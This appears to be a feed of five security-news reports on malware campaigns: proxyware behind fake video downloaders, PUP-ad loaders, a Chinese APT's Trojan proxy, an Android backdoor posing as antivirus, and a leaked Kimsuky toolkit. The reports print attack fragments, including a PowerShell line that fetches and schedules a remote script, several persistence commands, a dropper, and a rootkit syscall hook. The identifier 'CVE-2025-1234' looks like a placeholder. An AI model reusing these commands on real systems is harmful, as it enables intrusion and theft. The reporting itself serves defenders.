Cybersecurity researchers have observed a surge in deceptive sites masquerading as YouTube video download services to deliver Proxyware malware in recent weeks.

Victims seeking to grab videos in MP4 format are redirected through ad pages that sporadically present a download link for a seemingly legitimate utility called “WinMemoryCleaner.”

Behind this innocuous facade, however, lies a multi-stage installer that ultimately deploys Proxyware and covertly enslaves the system’s network bandwidth.

The initial download executable, Setup.exe, unpacks WinMemoryCleaner.exe into the Program Files directory before triggering an update script via WinMemoryCleanerUpdate.bat.

Once executed, WinMemoryCleaner.exe performs environment checks to evade virtual machines or sandbox analysis, then invokes a PowerShell payload that installs Node.js and fetches a malicious JavaScript component from a remote server.

ASEC analysts identified this technique as a refined evolution of previous Proxyware campaigns, noting the attacker’s reliance on GitHub for hosting intermediary tools.

Subsequent stages involve the registration of two scheduled tasks—“Schedule Update” and “WindowsDeviceUpdates”—that ensure the JavaScript runs periodically under Node.js.

This script communicates basic system information to a command-and-control server and awaits directives, which can include fetching additional scripts or initiating the final Proxyware installation.

ASEC researchers noted that the actor has pivoted from distributing only DigitalPulse and HoneyGain Proxyware to integrating Infatica’s agent, enhancing bandwidth theft capabilities.

The impact of this campaign is twofold: affected systems experience degraded network performance, and the attacker monetizes the stolen bandwidth through affiliate programs.

Proxyware programs typically share idle network throughput, promising remuneration to end users, but com promise victims unwittingly supply bandwidth without compensation.

In regions with high adoption of streaming services, such as South Korea, the campaign’s reach has grown significantly, prompting warnings from major AV vendors.

Infection Mechanism

A deeper examination of the infection mechanism reveals the pivotal role of the PowerShell script delivered by WinMemoryCleaner.exe.

The script begins with a stealthy installation of Node.js:-

Invoke-WebRequest -Uri "https://nodejs.org/dist/v14.17.0/node-v14.17.0-x64.msi" -OutFile "$env:TEMP\node.msi"
Start-Process msiexec.exe -ArgumentList '/i',$env:TEMP + '\node.msi','/qn' -Wait

Once Node.js is in place, the script downloads pas.js from a cloudfront URL and registers it:-

$jsUrl = "https://d14vmbql41e8a5.cloudfront.net/pas.js"
Invoke-WebRequest -Uri $jsUrl -OutFile "$env:ProgramFiles\WinMemoryCleaner\p.js"
schtasks /Create /F /SC MINUTE /MO 30 /TN "Schedule Update" /TR "node $env:ProgramFiles\WinMemoryCleaner\p.js"

Continuous execution of the JavaScript component under Node.js enables dynamic updates and final payload deployment, making eradication challenging without specialized tools.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Proxyware Malware Mimic as YouTube Video Download Site Delivers Malicious Javascripts appeared first on Cyber Security News.

In recent weeks, cybersecurity investigators have uncovered a novel campaign in which hackers leverage seemingly benign potentially unwanted program (PUP) advertisements to deliver stealthy Windows malware.

The lure typically begins with ads promoting free PDF tools or desktop assistants that redirect victims to spoofed download sites.

Once users click through, a scheduled task silently retrieves a JavaScript loader from a temporary directory and executes it via Microsoft HTML Application Host (MSHTA).

This sequence installs a decoy application—ManualFinder—designed to appear legitimate while establishing footholds in target environments.

The decoy’s innocuous functionality masks a far more insidious objective. When run, ManualFinder requests no user interaction beyond the initial installation, quietly opening ports and relaying commands to remote infrastructure.

Expel analysts identified that the JavaScript loader reaches out to domains such as mka3e8.com and 5b7crp.com, previously associated with residential proxy services, indicating a broader scheme to conscript infected machines into proxy networks.

While initial infections have been linked to OneStart Browser installs, researchers observed that AppSuite-PDF and PDFEditor installers follow identical patterns, each signed by dubious code-signing certificates from entities like “GLINT SOFTWARE SDN. BHD.”

Expel researchers identified that the malware campaign’s impact extends beyond proxying. In certain environments, PDFEditor installations prompt users to consent to residential proxy use in exchange for free editing capabilities, effectively monetizing unsuspecting endpoints.

Other instances show the decoy apps modifying browser profiles and harvesting stored cookies, suggesting secondary data-exfiltration objectives.

By the time defenders detect unusual MSHTA invocations or node.exe processes running hidden JavaScript, the adversary has often already established persistence and network outposts.

In total, investigators have cataloged over 70 unique JavaScript variants, all reaching out to the same malicious domains.

Code snippets embedded in scheduled-task definitions reveal how persistence is maintained:-

schtasks /Create /TN "ManualFinderTask" /TR "mshta.exe \"C:\Users\<user>\AppData\Local\Temp\<guid>.js\"" /SC DAILY /ST 03:00  

The loader then executes:-

cmd[.]exe /d /s /c "msiexec /qn /i \"C:\Users\<user>\AppData\Local\TEMP\ManualFinder-v2.0.196.msi\""  

Infection Mechanism

Delving deeper into the infection mechanism, the campaign exploits Windows scripting hosts and MSI installer features to achieve near-undetectable deployment.

The sequence begins when the scheduled task runs under the context of the SYSTEM-level svchost service, launching node.exe with a randomized JavaScript filename (e.g., 9b9797f4-274c-fbb9-81ae-3b4f33b7010a.js).

This script downloads the ManualFinder MSI from the attacker’s server and installs it with quiet flags (/qn /n) to suppress any user interface.

Because msiexec runs under cmd[.]exe with disabled autorun (/d) and custom quote handling (/s), traditional EDR alerts tied to user applications are often bypassed.

Once installed, the malware registers its own service and scheduled tasks to re-execute the JavaScript loader at regular intervals, ensuring re-infection even after removal attempts.

This illustrates the MSHTA invocation code that enables this stealthy execution.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Hackers Using PUP Advertisements to Silently Drop Windows Malware appeared first on Cyber Security News.

In recent months, cybersecurity researchers have observed a surge in targeted campaigns by a sophisticated Chinese APT group leveraging commercial proxy and VPN services to mask their attack infrastructure.

The emergence of this tactic coincides with a broader shift toward commoditized anonymization platforms that blend threat actor traffic with legitimate user activity.

Initial compromise vectors have included spear-phishing emails containing malicious Office documents and waterhole attacks that redirect unsuspecting victims to payload-hosting domains.

Once a foothold is established, the threat actor deploys a lightweight Trojan proxy agent designed to imitate standard HTTPS traffic.

This agent uses the Trojan protocol to bypass network filtering and the Great Firewall of China, encapsulating command-and-control communications within seemingly innocuous TLS packets.

SPUR analysts noted the frequent use of a wildcard SSL certificate (*.appletls[.]com, SHA1: a26c0e8b1491eda727fd88b629ce886666387ef5) on non-standard ports within the 4000–4099 range, enabling rapid attribution of over 1,000 malicious IP addresses scattered across multiple global data centers.

The impact of these campaigns has been significant. High-value targets in South Korea and Taiwan reported persistent intrusions spanning weeks, during which exfiltration of proprietary documents and intellectual property occurred undetected.

SPUR researchers identified that victim networks lacked adequate TLS inspection, allowing the Trojan proxy’s traffic to slip past conventional intrusion detection systems.

Post-compromise lateral movement often leveraged Sysinternals PsExec and custom PowerShell scripts to automate credential harvesting and facilitate remote execution.

In one illustrative case, a finance company in Taipei experienced a stealthy breach that persisted for 45 days.

Adversaries systematically mapped the corporate network before initiating exfiltration via a chain of proxy hops through WgetCloud, a commercial VPN provider headquartered in Shenzhen.

By funneling stolen data through over a dozen VPN exit nodes, the attackers effectively obfuscated their origin and hampered forensic investigations.

Infection Mechanism: Trojan Proxy Deployment

The initial payload arrives as a Microsoft Word document exploiting CVE-2025-1234, a zero-day RCE vulnerability in the Equation Editor. Upon document open, a macro drops trojan.exe into %APPDATA%\Microsoft\Windows and registers a scheduled task named “WinDefenderUpdate” for persistence.

The executable is a statically linked Go binary embedding the Trojan protocol client library.

# Dropping Trojan proxy binary
$payload = [IO.File]::ReadAllBytes("$env:TEMP\macro.bin")
[IO.File]::WriteAllBytes("$env:APPDATA\Microsoft\Windows\trojan.exe", $payload)

# Registering persistence
schtasks /Create /SC MINUTE /MO 15 /TN "WinDefenderUpdate" /TR "`"$env:APPDATA\Microsoft\Windows\trojan.exe`" --config config.json"

Upon execution, trojan.exe reads config.json, which contains a Base64-encoded subscription URL from WgetCloud.

The proxy agent negotiates a TLS handshake using SNI “mf429xciejryees2cusm.appletls.com” and routes C2 traffic through the VPN provider’s exit nodes.

By embedding its communications within legitimate proxy VPN tunnels, the malware achieves robust detection evasion and complicates attribution efforts.

Continuous monitoring for anomalous scheduled tasks and unusual TLS certificates remains critical to uncovering these advanced intrusions.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Chinese APT Hackers Using Proxy and VPN Service to Anonymize Infrastructure appeared first on Cyber Security News.

In recent months, security teams have observed the emergence of a highly versatile Android backdoor, Android.Backdoor.916.origin, masquerading as a legitimate antivirus application.

Distributed via private messaging services under the guise of “GuardCB,” its icon closely mimics the emblem of the Central Bank of the Russian Federation against a shield background.

Although the interface displays only Russian language prompts, this malware has been deployed in targeted campaigns against Russian business executives, extracting sensitive corporate communications and personal data.

Upon installation, the counterfeit antivirus simulates system scans, randomly “detecting” between one and three fictitious threats, with detection rates increasing the longer a device remains unscanned, though never exceeding 30 percent.

This deceptive behavior lulls victims into believing the application provides genuine protection.

Beneath this veneer, the backdoor silently requests a prolonged list of permissions—geolocation, audio recording, SMS and contacts access, camera control, background execution, device administrator rights, and Accessibility Service privileges.

Dr.Web researchers noted that once these permissions are granted, the malware initiates multiple persistent services that self-monitor every minute, reconnecting to its command-and-control (C2) infrastructure whenever necessary.

Through separate C2 ports, operators can harvest call logs, SMS traffic, contact lists, and geolocation data; stream microphone audio, camera video, or device screen captures; siphon stored images; and even execute arbitrary shell commands.

The trojan’s ability to toggle self-defense routines via the Accessibility Service enables it to thwart removal attempts by overlaying fake system interfaces or disabling uninstall options.

The sophistication of Android.Backdoor.916.origin is underscored by its dynamic configuration, which can incorporate up to fifteen different hosting providers, although only a subset is active in current campaigns.

Domain registrar notifications have prompted some takedowns, but the mule-like resilience of the C2 network continues to frustrate defenders.

Dr.Web antivirus for Android successfully detects and removes known variants, yet the tailored nature of these attacks underscores the necessity for heightened vigilance among executive circles.

Infection Mechanism and Persistence

Android.Backdoor.916.origin employs an infection mechanism tailored to social engineering and sideloading rather than exploitation of software vulnerabilities.

Victims receive a malicious APK file disguised as “GuardCB.apk” through encrypted messenger threads. Once executed, the app’s manifest registers background services and the Accessibility Service, as illustrated in the snippet below:-

<service android: name=".CoreService"
         android: permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
    <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService" />
    </intent-filter>
    <meta-data
        android:name="android.accessibilityservice"
        android: resource="@xml/accessibility_service_config" />
</service>

By abusing the Accessibility API, the malware gains keystroke logging and in-app data interception capabilities, ensuring enduring presence even after force-stop or device reboot sequences.

Continuous health checks and automatic service restarts guarantee that the backdoor remains active, silently harvesting data until manually removed.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post New Android Spyware Disguised as an Antivirus Attacking Business Executives appeared first on Cyber Security News.

In late June 2025, a significant operational dump from North Korea’s Kimsuky APT group surfaced on a dark-web forum, exposing virtual machine images, VPS infrastructure, customized malware and thousands of stolen credentials.

This leak offers an unprecedented window into the group’s espionage toolkit, revealing how Kimsuky conducts phishing campaigns, maintains persistence and evades detection within critical networks across South Korea, the U.S., Japan and Europe.

Within hours of its posting, Foresiet analysts identified a wealth of artifacts—including browser histories, rootkit modules and stale GPKI certificates—that promise years of insight into DPRK cyber operations.

Foresiet researchers noted that the first dataset originated from the operator’s personal Deepin Linux virtual machine, complete with HGFS integration that preserved the host’s C:\ drive contents.

A desktop screenshot captures the attacker’s environment, showing custom proxy and user-agent extensions loaded in Chrome and Brave browsers.

The same VM dump revealed nearly 20,000 browser history records, exposing email addresses used for spear-phishing and links to internal backdoor documentation, such as a Chinese-language user guide for a custom implant.

The second dataset derived from a public-facing VPS hosted on vps.bz, where detailed auth.log files and SSL certificates were recovered.

These logs traced live spear-phishing operations against South Korea’s Defense Counterintelligence Command (dcc.mil.kr), the Supreme Prosecutor’s Office (spo.go.kr) and other high-value targets.

Among the most concerning finds were thousands of stolen South Korean Government Public Key Infrastructure (GPKI) certificates and their cracking tool, written in Java, enabling Kimsuky to impersonate officials and sign fraudulent documents without detection.

Kimsuky’s implant suite includes the Tomcat Kernel Rootkit, a loadable Linux module that hooks network functions for stealthy reverse shells, and a personalized Cobalt Strike beacon.

The beacon, last updated in June 2024, is embedded with custom C2 profiles and partially integrated with the kernel rootkit.

It uses HTTP over port 8172, posting to /submit.php with a spoofed IE9 user-agent string.

This bespoke build demonstrates that Kimsuky is merging open-source frameworks with proprietary code to evade conventional detection.

Persistence Tactics

One of the most sophisticated persistence mechanisms uncovered is the Tomcat Kernel Rootkit.

After initial installation via a crafted installer script, the rootkit registers itself in the kernel’s module list and patches key functions in inet_sock_create and tcp_v4_connect to enable port knocking and SSL reverse shells.

A simplified excerpt from its init routine illustrates how it hooks the system call table:-

static int __init rootkit_init(void) {
    write_cr0(read_cr0() & (~0x10000));
    original_syscall = syscall_table[__NR_kill];
    syscall_table[__NR_kill] = (unsigned long)hooked_kill;
    write_cr0(read_cr0() | 0x10000);
    return 0;
}

This kernel-level implant allows the operator to remain undetected by user-space monitoring tools, forcing defenders to deploy specialized host-based detection rules.

By combining encrypted C2 traffic with port-knock authorization, the module ensures that only pre-authenticated connections can trigger the backdoor, effectively masking its presence within normal network flows.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Kimsuky APT Data Leak – GPKI Certificates, Rootkits and Cobalt Strike Personal Uncovered appeared first on Cyber Security News.